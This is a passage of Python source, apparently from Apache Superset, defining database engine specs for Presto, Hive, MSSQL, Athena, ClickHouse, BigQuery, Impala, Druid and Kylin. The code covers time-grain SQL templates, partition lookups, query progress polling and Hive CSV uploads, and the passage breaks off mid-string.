    @classmethod
    def adjust_database_uri(cls, uri, selected_schema=None):
        # MySQL has a single namespace level, so the selected schema simply
        # replaces the database component of the URI.
        if selected_schema:
            uri.database = selected_schema
        return uri

    @classmethod
    def epoch_to_dttm(cls):
        return 'from_unixtime({col})'

    @classmethod
    def extract_error_message(cls, e):
        """Extract error message for queries"""
        message = str(e)
        try:
            # MySQL driver errors typically carry (errno, message) in args;
            # prefer the human-readable message when present.
            if isinstance(e.args, tuple) and len(e.args) > 1:
                message = e.args[1]
        except Exception:
            pass
        return message
class PrestoEngineSpec(BaseEngineSpec):
    """Engine spec for Presto."""
    engine = 'presto'
    # PyHive's presto cursor receives bind values through ``parameters``.
    cursor_execute_kwargs = {'parameters': None}

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'),
              "date_trunc('second', CAST({col} AS TIMESTAMP))",
              'PT1S'),
        Grain('minute', _('minute'),
              "date_trunc('minute', CAST({col} AS TIMESTAMP))",
              'PT1M'),
        Grain('hour', _('hour'),
              "date_trunc('hour', CAST({col} AS TIMESTAMP))",
              'PT1H'),
        Grain('day', _('day'),
              "date_trunc('day', CAST({col} AS TIMESTAMP))",
              'P1D'),
        Grain('week', _('week'),
              "date_trunc('week', CAST({col} AS TIMESTAMP))",
              'P1W'),
        Grain('month', _('month'),
              "date_trunc('month', CAST({col} AS TIMESTAMP))",
              'P1M'),
        Grain('quarter', _('quarter'),
              "date_trunc('quarter', CAST({col} AS TIMESTAMP))",
              'P0.25Y'),
        Grain('week_ending_saturday', _('week_ending_saturday'),
              "date_add('day', 5, date_trunc('week', date_add('day', 1, "
              'CAST({col} AS TIMESTAMP))))',
              'P1W/1970-01-03T00:00:00Z'),
        Grain('week_start_sunday', _('week_start_sunday'),
              "date_add('day', -1, date_trunc('week', "
              "date_add('day', 1, CAST({col} AS TIMESTAMP))))",
              '1969-12-28T00:00:00Z/P1W'),
        Grain('year', _('year'),
              "date_trunc('year', CAST({col} AS TIMESTAMP))",
              'P1Y'),
    )

    @classmethod
    def adjust_database_uri(cls, uri, selected_schema=None):
        """Mutate *uri* so queries run against *selected_schema*.

        Presto database strings look like ``catalog[/schema]``; the schema
        portion (after the slash) is replaced or appended.
        """
        database = uri.database
        if selected_schema and database:
            if '/' in database:
                database = database.split('/')[0] + '/' + selected_schema
            else:
                database += '/' + selected_schema
            uri.database = database
        return uri

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return a Presto SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "from_iso8601_date('{}')".format(dttm.isoformat()[:10])
        if tt == 'TIMESTAMP':
            return "from_iso8601_timestamp('{}')".format(dttm.isoformat())
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))

    @classmethod
    def epoch_to_dttm(cls):
        """SQL expression template converting an epoch-seconds column."""
        return 'from_unixtime({col})'

    @classmethod
    @cache_util.memoized_func(
        timeout=600,
        key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
    def fetch_result_sets(cls, db, datasource_type, force=False):
        """Returns the dictionary {schema : [result_set_name]}.

        Datasource_type can be 'table' or 'view'.
        Empty schema corresponds to the list of full names of the all
        tables or views: <schema>.<result_set_name>.
        """
        result_set_df = db.get_df(
            """SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S
               ORDER BY concat(table_schema, '.', table_name)""".format(
                datasource_type.upper(),
            ),
            None)
        result_sets = defaultdict(list)
        for unused, row in result_set_df.iterrows():
            result_sets[row['table_schema']].append(row['table_name'])
            # Also index every table under the '' pseudo-schema by full name.
            result_sets[''].append('{}.{}'.format(
                row['table_schema'], row['table_name']))
        return result_sets

    @classmethod
    def extra_table_metadata(cls, database, table_name, schema_name):
        """Return partition metadata for *table_name*, or {} if unpartitioned."""
        indexes = database.get_indexes(table_name, schema_name)
        if not indexes:
            return {}
        cols = indexes[0].get('column_names', [])
        full_table_name = table_name
        if schema_name and '.' not in table_name:
            full_table_name = '{}.{}'.format(schema_name, table_name)
        pql = cls._partition_query(full_table_name)
        col_name, latest_part = cls.latest_partition(
            table_name, schema_name, database, show_first=True)
        return {
            'partitions': {
                'cols': cols,
                'latest': {col_name: latest_part},
                'partitionQuery': pql,
            },
        }

    @classmethod
    def handle_cursor(cls, cursor, query, session):
        """Updates progress information"""
        logging.info('Polling the cursor for progress')
        polled = cursor.poll()
        # poll returns dict -- JSON status information or ``None``
        # if the query is done
        # https://github.com/dropbox/PyHive/blob/
        # b34bdbf51378b3979eaf5eca9e956f06ddc36ca0/pyhive/presto.py#L178
        while polled:
            # Update the object and wait for the kill signal.
            stats = polled.get('stats', {})
            query = session.query(type(query)).filter_by(id=query.id).one()
            if query.status in [QueryStatus.STOPPED, QueryStatus.TIMED_OUT]:
                cursor.cancel()
                break
            if stats:
                state = stats.get('state')
                # if already finished, then stop polling
                if state == 'FINISHED':
                    break
                # Guard against missing keys: float(None) raises TypeError.
                completed_splits = float(stats.get('completedSplits') or 0)
                total_splits = float(stats.get('totalSplits') or 0)
                if total_splits and completed_splits:
                    progress = 100 * (completed_splits / total_splits)
                    logging.info(
                        'Query progress: {} / {} '
                        'splits'.format(completed_splits, total_splits))
                    if progress > query.progress:
                        query.progress = progress
                    session.commit()
            time.sleep(1)
            logging.info('Polling the cursor for progress')
            polled = cursor.poll()

    @classmethod
    def extract_error_message(cls, e):
        """Pull a readable message out of the layered Presto/DBAPI errors."""
        if (
                hasattr(e, 'orig') and
                type(e.orig).__name__ == 'DatabaseError' and
                isinstance(e.orig[0], dict)):
            error_dict = e.orig[0]
            return '{} at {}: {}'.format(
                error_dict.get('errorName'),
                error_dict.get('errorLocation'),
                error_dict.get('message'),
            )
        if (
                type(e).__name__ == 'DatabaseError' and
                hasattr(e, 'args') and
                len(e.args) > 0
        ):
            error_dict = e.args[0]
            return error_dict.get('message')
        return utils.error_msg_from_exception(e)

    @classmethod
    def _partition_query(
            cls, table_name, limit=0, order_by=None, filters=None):
        """Returns a partition query

        :param table_name: the name of the table to get partitions from
        :type table_name: str
        :param limit: the number of partitions to be returned
        :type limit: int
        :param order_by: a list of tuples of field name and a boolean
            that determines if that field should be sorted in descending
            order
        :type order_by: list of (str, bool) tuples
        :param filters: dict of field name and filter value combinations
        """
        limit_clause = 'LIMIT {}'.format(limit) if limit else ''
        order_by_clause = ''
        if order_by:
            order_by_parts = []
            for field, desc in order_by:
                order_by_parts.append(field + ' DESC' if desc else '')
            order_by_clause = 'ORDER BY ' + ', '.join(order_by_parts)
        where_clause = ''
        if filters:
            where_parts = []
            for field, value in filters.items():
                where_parts.append("{field} = '{value}'".format(**locals()))
            where_clause = 'WHERE ' + ' AND '.join(where_parts)
        sql = textwrap.dedent("""\
            SHOW PARTITIONS FROM {table_name}
            {where_clause}
            {order_by_clause}
            {limit_clause}
        """).format(**locals())
        return sql

    @classmethod
    def _latest_partition_from_df(cls, df):
        """Return the first cell of *df* (top row of SHOW PARTITIONS), if any."""
        recs = df.to_records(index=False)
        if recs:
            return recs[0][0]

    @classmethod
    def latest_partition(cls, table_name, schema, database, show_first=False):
        """Returns col name and the latest (max) partition value for a table

        :param table_name: the name of the table
        :type table_name: str
        :param schema: schema / database / namespace
        :type schema: str
        :param database: database query will be run against
        :type database: models.Database
        :param show_first: displays the value for the first partitioning key
          if there are many partitioning keys
        :type show_first: bool

        >>> latest_partition('foo_table')
        '2018-01-01'
        """
        indexes = database.get_indexes(table_name, schema)
        # Guard against unpartitioned tables: indexes may be empty, which
        # would otherwise raise an IndexError below.
        if not indexes or len(indexes[0]['column_names']) < 1:
            raise SupersetTemplateException(
                'The table should have one partitioned field')
        elif not show_first and len(indexes[0]['column_names']) > 1:
            raise SupersetTemplateException(
                'The table should have a single partitioned field '
                'to use this function. You may want to use '
                '`presto.latest_sub_partition`')
        part_field = indexes[0]['column_names'][0]
        sql = cls._partition_query(table_name, 1, [(part_field, True)])
        df = database.get_df(sql, schema)
        return part_field, cls._latest_partition_from_df(df)

    @classmethod
    def latest_sub_partition(cls, table_name, schema, database, **kwargs):
        """Returns the latest (max) partition value for a table

        A filtering criteria should be passed for all fields that are
        partitioned except for the field to be returned. For example,
        if a table is partitioned by (``ds``, ``event_type`` and
        ``event_category``) and you want the latest ``ds``, you'll want
        to provide a filter as keyword arguments for both
        ``event_type`` and ``event_category`` as in
        ``latest_sub_partition('my_table',
            event_category='page', event_type='click')``

        :param table_name: the name of the table, can be just the table
            name or a fully qualified table name as ``schema_name.table_name``
        :type table_name: str
        :param schema: schema / database / namespace
        :type schema: str
        :param database: database query will be run against
        :type database: models.Database
        :param kwargs: keyword arguments define the filtering criteria
            on the partition list. There can be many of these.
        :type kwargs: str

        >>> latest_sub_partition('sub_partition_table', event_type='click')
        '2018-01-01'
        """
        indexes = database.get_indexes(table_name, schema)
        part_fields = indexes[0]['column_names']
        for k in kwargs.keys():
            # BUGFIX: was ``if k not in k in part_fields`` -- a chained
            # comparison that always evaluated False, so unknown filter
            # fields were silently accepted. Also format the field name
            # into the message.
            if k not in part_fields:
                msg = 'Field [{k}] is not part of the partitioning key'.format(
                    k=k)
                raise SupersetTemplateException(msg)
        if len(kwargs.keys()) != len(part_fields) - 1:
            msg = (
                'A filter needs to be specified for {} out of the '
                '{} fields.'
            ).format(len(part_fields) - 1, len(part_fields))
            raise SupersetTemplateException(msg)
        for field in part_fields:
            if field not in kwargs.keys():
                field_to_return = field
        sql = cls._partition_query(
            table_name, 1, [(field_to_return, True)], kwargs)
        df = database.get_df(sql, schema)
        if df.empty:
            return ''
        return df.to_dict()[field_to_return][0]
class HiveEngineSpec(PrestoEngineSpec):
    """Reuses PrestoEngineSpec functionality."""
    engine = 'hive'
    # Run Hive queries asynchronously through PyHive.
    cursor_execute_kwargs = {'async': True}

    # Scoping regex at class level to avoid recompiling
    # 17/02/07 19:36:38 INFO ql.Driver: Total jobs = 5
    jobs_stats_r = re.compile(
        r'.*INFO.*Total jobs = (?P<max_jobs>[0-9]+)')
    # 17/02/07 19:37:08 INFO ql.Driver: Launching Job 2 out of 5
    launching_job_r = re.compile(
        '.*INFO.*Launching Job (?P<job_number>[0-9]+) out of '
        '(?P<max_jobs>[0-9]+)')
    # 17/02/07 19:36:58 INFO exec.Task: 2017-02-07 19:36:58,152 Stage-18
    # map = 0%,  reduce = 0%
    stage_progress_r = re.compile(
        r'.*INFO.*Stage-(?P<stage_number>[0-9]+).*'
        r'map = (?P<map_progress>[0-9]+)%.*'
        r'reduce = (?P<reduce_progress>[0-9]+)%.*')

    @classmethod
    def patch(cls):
        """Monkey-patch PyHive to use Superset's forked Thrift bindings."""
        from pyhive import hive
        from superset.db_engines import hive as patched_hive
        from TCLIService import (
            constants as patched_constants,
            ttypes as patched_ttypes,
            TCLIService as patched_TCLIService)
        hive.TCLIService = patched_TCLIService
        hive.constants = patched_constants
        hive.ttypes = patched_ttypes
        hive.Cursor.fetch_logs = patched_hive.fetch_logs

    @classmethod
    @cache_util.memoized_func(
        timeout=600,
        key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
    def fetch_result_sets(cls, db, datasource_type, force=False):
        # Hive does not expose INFORMATION_SCHEMA like Presto; fall back to
        # the generic inspector-based implementation.
        return BaseEngineSpec.fetch_result_sets(
            db, datasource_type, force=force)

    @classmethod
    def fetch_data(cls, cursor, limit):
        """Fetch rows, surfacing any async query error as an exception."""
        from TCLIService import ttypes
        state = cursor.poll()
        if state.operationState == ttypes.TOperationState.ERROR_STATE:
            raise Exception('Query error', state.errorMessage)
        return super(HiveEngineSpec, cls).fetch_data(cursor, limit)

    @staticmethod
    def create_table_from_csv(form, table):
        """Uploads a csv file and creates a superset datasource in Hive."""
        def convert_to_hive_type(col_type):
            """maps tableschema's types to hive types"""
            tableschema_to_hive_types = {
                'boolean': 'BOOLEAN',
                'integer': 'INT',
                'number': 'DOUBLE',
                'string': 'STRING',
            }
            return tableschema_to_hive_types.get(col_type, 'STRING')

        table_name = form.name.data
        if config.get('UPLOADED_CSV_HIVE_NAMESPACE'):
            if '.' in table_name:
                # BUGFIX: the message previously read the unrelated
                # ``HIVE_NAMESPACE`` key and rendered ``None``.
                raise Exception(
                    "You can't specify a namespace. "
                    'All tables will be uploaded to the `{}` namespace'.format(
                        config.get('UPLOADED_CSV_HIVE_NAMESPACE')))
            table_name = '{}.{}'.format(
                config.get('UPLOADED_CSV_HIVE_NAMESPACE'), table_name)
        filename = form.csv_file.data.filename

        bucket_path = config['CSV_TO_HIVE_UPLOAD_S3_BUCKET']
        if not bucket_path:
            logging.info('No upload bucket specified')
            raise Exception(
                'No upload bucket specified. You can specify one in the config file.')

        # BUGFIX: ``table_name``/``filename`` were re-assigned from the form
        # here, discarding the namespace prefix computed above.
        upload_prefix = config['CSV_TO_HIVE_UPLOAD_DIRECTORY']
        upload_path = config['UPLOAD_FOLDER'] + \
            secure_filename(form.csv_file.data.filename)
        hive_table_schema = Table(upload_path).infer()
        column_name_and_type = []
        for column_info in hive_table_schema['fields']:
            column_name_and_type.append(
                '{} {}'.format(
                    column_info['name'], convert_to_hive_type(column_info['type'])))
        schema_definition = ', '.join(column_name_and_type)

        s3 = boto3.client('s3')
        location = os.path.join('s3a://', bucket_path, upload_prefix, table_name)
        s3.upload_file(
            upload_path, bucket_path,
            os.path.join(upload_prefix, table_name, filename))
        sql = """CREATE TABLE {table_name} ( {schema_definition} )
            ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' STORED AS
            TEXTFILE LOCATION '{location}'
            tblproperties ('skip.header.line.count'='1')""".format(**locals())
        logging.info(form.con.data)
        engine = create_engine(form.con.data.sqlalchemy_uri_decrypted)
        engine.execute(sql)

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return a Hive SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "CAST('{}' AS DATE)".format(dttm.isoformat()[:10])
        elif tt == 'TIMESTAMP':
            return "CAST('{}' AS TIMESTAMP)".format(
                dttm.strftime('%Y-%m-%d %H:%M:%S'))
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))

    @classmethod
    def adjust_database_uri(cls, uri, selected_schema=None):
        """Point the (mutable) SQLAlchemy *uri* at *selected_schema*."""
        if selected_schema:
            uri.database = selected_schema
        return uri

    @classmethod
    def extract_error_message(cls, e):
        """Prefer the Thrift status message embedded in PyHive errors."""
        try:
            msg = e.message.status.errorMessage
        except Exception:
            msg = str(e)
        return msg

    @classmethod
    def progress(cls, log_lines):
        """Estimate overall query progress (0-100) from Hive log lines."""
        total_jobs = 1  # assuming there's at least 1 job
        current_job = 1
        stages = {}
        for line in log_lines:
            match = cls.jobs_stats_r.match(line)
            if match:
                total_jobs = int(match.groupdict()['max_jobs']) or 1
            match = cls.launching_job_r.match(line)
            if match:
                current_job = int(match.groupdict()['job_number'])
                total_jobs = int(match.groupdict()['max_jobs']) or 1
                # Each new job starts its stages from scratch.
                stages = {}
            match = cls.stage_progress_r.match(line)
            if match:
                stage_number = int(match.groupdict()['stage_number'])
                map_progress = int(match.groupdict()['map_progress'])
                reduce_progress = int(match.groupdict()['reduce_progress'])
                stages[stage_number] = (map_progress + reduce_progress) / 2
        logging.info(
            'Progress detail: {}, '
            'current job {}, '
            'total jobs: {}'.format(stages, current_job, total_jobs))

        stage_progress = sum(
            stages.values()) / len(stages.values()) if stages else 0

        progress = (
            100 * (current_job - 1) / total_jobs + stage_progress / total_jobs
        )
        return int(progress)

    @classmethod
    def get_tracking_url(cls, log_lines):
        """Return the first YARN tracking URL found in the logs, if any."""
        lkp = 'Tracking URL = '
        for line in log_lines:
            if lkp in line:
                return line.split(lkp)[1]

    @classmethod
    def handle_cursor(cls, cursor, query, session):
        """Updates progress information"""
        from pyhive import hive
        unfinished_states = (
            hive.ttypes.TOperationState.INITIALIZED_STATE,
            hive.ttypes.TOperationState.RUNNING_STATE,
        )
        polled = cursor.poll()
        last_log_line = 0
        tracking_url = None
        job_id = None
        while polled.operationState in unfinished_states:
            query = session.query(type(query)).filter_by(id=query.id).one()
            if query.status == QueryStatus.STOPPED:
                cursor.cancel()
                break

            log = cursor.fetch_logs() or ''
            if log:
                log_lines = log.splitlines()
                progress = cls.progress(log_lines)
                logging.info('Progress total: {}'.format(progress))
                needs_commit = False
                if progress > query.progress:
                    query.progress = progress
                    needs_commit = True
                if not tracking_url:
                    tracking_url = cls.get_tracking_url(log_lines)
                    if tracking_url:
                        job_id = tracking_url.split('/')[-2]
                        logging.info(
                            'Found the tracking url: {}'.format(tracking_url))
                        tracking_url = tracking_url_trans(tracking_url)
                        logging.info(
                            'Transformation applied: {}'.format(tracking_url))
                        query.tracking_url = tracking_url
                        logging.info('Job id: {}'.format(job_id))
                        needs_commit = True
                if job_id and len(log_lines) > last_log_line:
                    # Wait for job id before logging things out
                    # this allows for prefixing all log lines and becoming
                    # searchable in something like Kibana
                    for log_line in log_lines[last_log_line:]:
                        logging.info('[{}] {}'.format(job_id, log_line))
                    last_log_line = len(log_lines)
                if needs_commit:
                    session.commit()
            time.sleep(hive_poll_interval)
            polled = cursor.poll()

    @classmethod
    def where_latest_partition(
            cls, table_name, schema, database, qry, columns=None):
        """Append a WHERE clause selecting the latest partition, or False."""
        try:
            col_name, value = cls.latest_partition(
                table_name, schema, database)
        except Exception:
            # table is not partitioned
            return False
        # BUGFIX: ``columns`` defaults to None; iterating it directly raised
        # a TypeError for unindexed tables.
        for c in columns or []:
            if str(c.name) == str(col_name):
                return qry.where(c == str(value))
        return False

    @classmethod
    def latest_sub_partition(cls, table_name, schema, database, **kwargs):
        # TODO(bogdan): implement`
        pass

    @classmethod
    def _latest_partition_from_df(cls, df):
        """Hive partitions look like ds={partition name}"""
        # BUGFIX: ``df.ix`` was removed from pandas; use positional ``iloc``.
        return df.iloc[:, 0].max().split('=')[1]

    @classmethod
    def _partition_query(
            cls, table_name, limit=0, order_by=None, filters=None):
        return 'SHOW PARTITIONS {table_name}'.format(**locals())

    @classmethod
    def modify_url_for_impersonation(cls, url, impersonate_user, username):
        """
        Modify the SQL Alchemy URL object with the user to impersonate if applicable.
        :param url: SQLAlchemy URL object
        :param impersonate_user: Bool indicating if impersonation is enabled
        :param username: Effective username
        """
        # Do nothing in the URL object since instead this should modify
        # the configuraiton dictionary. See get_configuration_for_impersonation
        pass

    @classmethod
    def get_configuration_for_impersonation(cls, uri, impersonate_user, username):
        """
        Return a configuration dictionary that can be merged with other configs
        that can set the correct properties for impersonating users
        :param uri: URI string
        :param impersonate_user: Bool indicating if impersonation is enabled
        :param username: Effective username
        :return: Dictionary with configs required for impersonation
        """
        configuration = {}
        url = make_url(uri)
        backend_name = url.get_backend_name()

        # Must be Hive connection, enable impersonation, and set param auth=LDAP|KERBEROS
        if (backend_name == 'hive' and 'auth' in url.query.keys() and
                impersonate_user is True and username is not None):
            configuration['hive.server2.proxy.user'] = username
        return configuration
class MssqlEngineSpec(BaseEngineSpec):
    """Engine spec for Microsoft SQL Server."""
    engine = 'mssql'
    limit_method = LimitMethod.WRAP_SQL

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'), 'DATEADD(second, '
              "DATEDIFF(second, '2000-01-01', {col}), '2000-01-01')",
              'PT1S'),
        Grain('minute', _('minute'), 'DATEADD(minute, '
              'DATEDIFF(minute, 0, {col}), 0)',
              'PT1M'),
        Grain('5 minute', _('5 minute'), 'DATEADD(minute, '
              'DATEDIFF(minute, 0, {col}) / 5 * 5, 0)',
              'PT5M'),
        Grain('half hour', _('half hour'), 'DATEADD(minute, '
              'DATEDIFF(minute, 0, {col}) / 30 * 30, 0)',
              'PT0.5H'),
        Grain('hour', _('hour'), 'DATEADD(hour, '
              'DATEDIFF(hour, 0, {col}), 0)',
              'PT1H'),
        Grain('day', _('day'), 'DATEADD(day, '
              'DATEDIFF(day, 0, {col}), 0)',
              'P1D'),
        Grain('week', _('week'), 'DATEADD(week, '
              'DATEDIFF(week, 0, {col}), 0)',
              'P1W'),
        Grain('month', _('month'), 'DATEADD(month, '
              'DATEDIFF(month, 0, {col}), 0)',
              'P1M'),
        Grain('quarter', _('quarter'), 'DATEADD(quarter, '
              'DATEDIFF(quarter, 0, {col}), 0)',
              'P0.25Y'),
        Grain('year', _('year'), 'DATEADD(year, '
              'DATEDIFF(year, 0, {col}), 0)',
              'P1Y'),
    )

    @classmethod
    def epoch_to_dttm(cls):
        """SQL expression template converting an epoch-seconds column.

        BUGFIX: this was previously a plain string class attribute, while
        every other engine spec (and callers invoking ``cls.epoch_to_dttm()``)
        treats it as a classmethod -- calling a string raised TypeError.
        """
        return "dateadd(S, {col}, '1970-01-01')"

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return a CONVERT() literal (style 126 = ISO-8601) for *dttm*."""
        return "CONVERT(DATETIME, '{}', 126)".format(dttm.isoformat())
class AthenaEngineSpec(BaseEngineSpec):
    """Engine spec for AWS Athena (Presto-style SQL functions)."""
    engine = 'awsathena'

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'),
              "date_trunc('second', CAST({col} AS TIMESTAMP))",
              'PT1S'),
        Grain('minute', _('minute'),
              "date_trunc('minute', CAST({col} AS TIMESTAMP))",
              'PT1M'),
        Grain('hour', _('hour'),
              "date_trunc('hour', CAST({col} AS TIMESTAMP))",
              'PT1H'),
        Grain('day', _('day'),
              "date_trunc('day', CAST({col} AS TIMESTAMP))",
              'P1D'),
        Grain('week', _('week'),
              "date_trunc('week', CAST({col} AS TIMESTAMP))",
              'P1W'),
        Grain('month', _('month'),
              "date_trunc('month', CAST({col} AS TIMESTAMP))",
              'P1M'),
        Grain('quarter', _('quarter'),
              "date_trunc('quarter', CAST({col} AS TIMESTAMP))",
              'P0.25Y'),
        Grain('week_ending_saturday', _('week_ending_saturday'),
              "date_add('day', 5, date_trunc('week', date_add('day', 1, "
              'CAST({col} AS TIMESTAMP))))',
              'P1W/1970-01-03T00:00:00Z'),
        Grain('week_start_sunday', _('week_start_sunday'),
              "date_add('day', -1, date_trunc('week', "
              "date_add('day', 1, CAST({col} AS TIMESTAMP))))",
              '1969-12-28T00:00:00Z/P1W'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return an Athena SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "from_iso8601_date('{}')".format(dttm.isoformat()[:10])
        if tt == 'TIMESTAMP':
            return "from_iso8601_timestamp('{}')".format(dttm.isoformat())
        # Default: explicit TIMESTAMP cast of the formatted value.
        return ("CAST ('{}' AS TIMESTAMP)"
                .format(dttm.strftime('%Y-%m-%d %H:%M:%S')))

    @classmethod
    def epoch_to_dttm(cls):
        """SQL expression template converting an epoch-seconds column."""
        return 'from_unixtime({col})'
class ClickHouseEngineSpec(BaseEngineSpec):
    """Dialect for ClickHouse analytical DB."""

    engine = 'clickhouse'

    # NOTE(review): flags consumed by the base query builder; presumably they
    # alter how time columns are grouped/selected for ClickHouse -- confirm
    # against BaseEngineSpec usage.
    time_secondary_columns = True
    time_groupby_inline = True

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('minute', _('minute'),
              'toStartOfMinute(toDateTime({col}))',
              'PT1M'),
        Grain('5 minute', _('5 minute'),
              'toDateTime(intDiv(toUInt32(toDateTime({col})), 300)*300)',
              'PT5M'),
        Grain('10 minute', _('10 minute'),
              'toDateTime(intDiv(toUInt32(toDateTime({col})), 600)*600)',
              'PT10M'),
        Grain('hour', _('hour'),
              'toStartOfHour(toDateTime({col}))',
              'PT1H'),
        Grain('day', _('day'),
              'toStartOfDay(toDateTime({col}))',
              'P1D'),
        Grain('month', _('month'),
              'toStartOfMonth(toDateTime({col}))',
              'P1M'),
        Grain('quarter', _('quarter'),
              'toStartOfQuarter(toDateTime({col}))',
              'P0.25Y'),
        Grain('year', _('year'),
              'toStartOfYear(toDateTime({col}))',
              'P1Y'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return a ClickHouse SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "toDate('{}')".format(dttm.strftime('%Y-%m-%d'))
        if tt == 'DATETIME':
            return "toDateTime('{}')".format(
                dttm.strftime('%Y-%m-%d %H:%M:%S'))
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
class BQEngineSpec(BaseEngineSpec):
    """Engine spec for Google's BigQuery
    As contributed by @mxmzdlv on issue #945"""
    engine = 'bigquery'

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'), 'TIMESTAMP_TRUNC({col}, SECOND)', 'PT1S'),
        Grain('minute', _('minute'), 'TIMESTAMP_TRUNC({col}, MINUTE)', 'PT1M'),
        Grain('hour', _('hour'), 'TIMESTAMP_TRUNC({col}, HOUR)', 'PT1H'),
        Grain('day', _('day'), 'TIMESTAMP_TRUNC({col}, DAY)', 'P1D'),
        Grain('week', _('week'), 'TIMESTAMP_TRUNC({col}, WEEK)', 'P1W'),
        Grain('month', _('month'), 'TIMESTAMP_TRUNC({col}, MONTH)', 'P1M'),
        Grain('quarter', _('quarter'),
              'TIMESTAMP_TRUNC({col}, QUARTER)', 'P0.25Y'),
        Grain('year', _('year'), 'TIMESTAMP_TRUNC({col}, YEAR)', 'P1Y'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Render *dttm* as a quoted BigQuery literal for *target_type*."""
        if target_type.upper() == 'DATE':
            fmt = '%Y-%m-%d'
        else:
            fmt = '%Y-%m-%d %H:%M:%S'
        return "'{}'".format(dttm.strftime(fmt))

    @classmethod
    def fetch_data(cls, cursor, limit):
        """Fetch rows, unpacking BigQuery ``Row`` objects into plain lists."""
        rows = super(BQEngineSpec, cls).fetch_data(cursor, limit)
        if rows and type(rows[0]).__name__ == 'Row':
            rows = [r.values() for r in rows]
        return rows
class ImpalaEngineSpec(BaseEngineSpec):
    """Engine spec for Cloudera's Impala"""

    engine = 'impala'

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('minute', _('minute'), "TRUNC({col}, 'MI')", 'PT1M'),
        Grain('hour', _('hour'), "TRUNC({col}, 'HH')", 'PT1H'),
        Grain('day', _('day'), "TRUNC({col}, 'DD')", 'P1D'),
        Grain('week', _('week'), "TRUNC({col}, 'WW')", 'P1W'),
        Grain('month', _('month'), "TRUNC({col}, 'MONTH')", 'P1M'),
        Grain('quarter', _('quarter'), "TRUNC({col}, 'Q')", 'P0.25Y'),
        Grain('year', _('year'), "TRUNC({col}, 'YYYY')", 'P1Y'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Return an Impala SQL literal representing *dttm* as *target_type*."""
        tt = target_type.upper()
        if tt == 'DATE':
            return "'{}'".format(dttm.strftime('%Y-%m-%d'))
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))

    @classmethod
    def get_schema_names(cls, inspector):
        """Return schema names, skipping internal ones prefixed with '_'."""
        schemas = [row[0] for row in inspector.engine.execute('SHOW SCHEMAS')
                   if not row[0].startswith('_')]
        return schemas
class DruidEngineSpec(BaseEngineSpec):
    """Engine spec for Druid.io"""

    engine = 'druid'
    # NOTE(review): flag presumably read by the base query builder to avoid
    # generating inner joins for this backend -- confirm against base class.
    inner_joins = False

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'), 'FLOOR({col} TO SECOND)', 'PT1S'),
        Grain('minute', _('minute'), 'FLOOR({col} TO MINUTE)', 'PT1M'),
        Grain('hour', _('hour'), 'FLOOR({col} TO HOUR)', 'PT1H'),
        Grain('day', _('day'), 'FLOOR({col} TO DAY)', 'P1D'),
        Grain('week', _('week'), 'FLOOR({col} TO WEEK)', 'P1W'),
        Grain('month', _('month'), 'FLOOR({col} TO MONTH)', 'P1M'),
        Grain('quarter', _('quarter'), 'FLOOR({col} TO QUARTER)', 'P3M'),
        Grain('year', _('year'), 'FLOOR({col} TO YEAR)', 'P1Y'),
    )
class KylinEngineSpec(BaseEngineSpec):
    """Dialect for Apache Kylin"""

    engine = 'kylin'

    # (name, translated label, SQL expression template, ISO-8601 duration).
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO SECOND) AS TIMESTAMP)',
              'PT1S'),
        Grain('minute', _('minute'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO MINUTE) AS TIMESTAMP)',
              'PT1M'),
        Grain('hour', _('hour'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO HOUR) AS TIMESTAMP)',
              'PT1H'),
        Grain('day', _('day'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO DAY) AS DATE)',
              'P1D'),
        Grain('week', _('week'),
              'CAST(TIMESTAMPADD(WEEK, WEEK(CAST({col} AS DATE)) - 1, \
              FLOOR(CAST({col} AS TIMESTAMP) TO YEAR)) AS DATE)',
              'P1W'),
        Grain('month', _('month'),
              'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO MONTH) AS DATE)',
              'P1M'),
        Grain('quarter', _('quarter'),
              'CAST(TIMESTAMPADD(QUARTER, QUARTER(CAST({col} AS DATE)) - 1, \
